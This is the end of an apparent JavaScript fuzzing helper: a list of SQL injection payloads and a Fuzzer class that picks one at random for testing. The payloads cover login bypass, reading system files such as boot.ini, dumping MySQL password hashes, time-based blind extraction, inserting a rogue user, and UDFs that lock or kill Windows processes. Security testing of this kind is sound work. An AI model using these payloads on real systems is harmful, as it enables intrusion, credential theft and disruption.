        "SELECT CHR(75)||CHR(76)||CHR(77)",
        "SELECT (CHaR(75)||CHaR(76)||CHaR(77))",
        "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
        "SELECT /*!32302 1/0, */ 1 FROM tablename",
        "SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'",
        "/*! MYSQL Special SQL *",
        "SELECT /*!32302 1/0, */ 1 FROM tablename",
        "SELECT User,Password FROM mysql.user;",
        "SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';",
        "create function LockWorkStation returns integer soname 'user32';",
        "select LockWorkStation();",
        "create function ExitProcess returns integer soname 'kernel32';",
        "select exitprocess();",
        "SELECT USER();",
        "SELECT password,USER() FROM mysql.user;",
        "SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;",
        "create table foo( line blob );",
        "load data infile 'c:/boot.ini' into table foo;",
        "select * from foo;",
        "select benchmark( 500000, sha1( 'test' ) );",
        "select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );",
        "select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );",
        "SELECT sleep(10);",
        "SELECT pg_sleep(10);",
        "IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))",
        "IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))",
        "BENCHMARK(howmanytimes, do this)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'",
        "SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'",
        "SELECT table_name FROM information_schema.tables WHERE table_schema = 'databasename'",
        "SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'",
        "';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--",
        "... WHERE users NOT IN ('First User', 'Second User') SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)",
        "SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int",
        "Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21",
        "SELECT name FROM sysobjects WHERE xtype = 'U'",
        "SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')",
        "INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)",
        "'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*",
        "' union select sum(columntofind) from users-- (S) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.",
        "SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--",
        "11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --",
        "11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-",
        "' HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1 HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --",
        "admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'",
    ]
}

export class Fuzzer {

    random(min, max) {
        return parseInt(Math.random() * (max - min) + min);
    }
    randomElementInArr(arr) {
        return arr[this.random(0, arr.length)];
    }

    fuzzString() {
        return this.randomElementInArr(fuzzDict.STRING_FUZZ);
    }
    fuzzNumber() {
        return this.randomElementInArr(fuzzDict.NUMBER_FUZZ);
    }
    fuzzTime() {
        return this.randomElementInArr(fuzzDict.TIME_FUZZ);
    }
    fuzzSTRING_EVENT_NAME_FUZZ() {
        return this.randomElementInArr(fuzzDict.STRING_EVENT_NAME_FUZZ);
    }
    fuzzPastTime() {
        return this.randomElementInArr(fuzzDict.PAST_TIME_FUZZ);
    }

    fuzzSQL() {
        return this.randomElementInArr(fuzzDict.SQL_INJECTION_DECTECTION_FUZZ);
    }

    fuzzSQL2() {
        return this.randomElementInArr(fuzzDict.LOGIN_SQL_INJECTION_DECTECTION_FUZZ);
    }

    fuzzSQL3() {
        return this.randomElementInArr(fuzzDict.EXCEPT_NUMBER_SQL_INJECTION_DECTECTION_FUZZ);
    }

    /*===============================================================================*/

}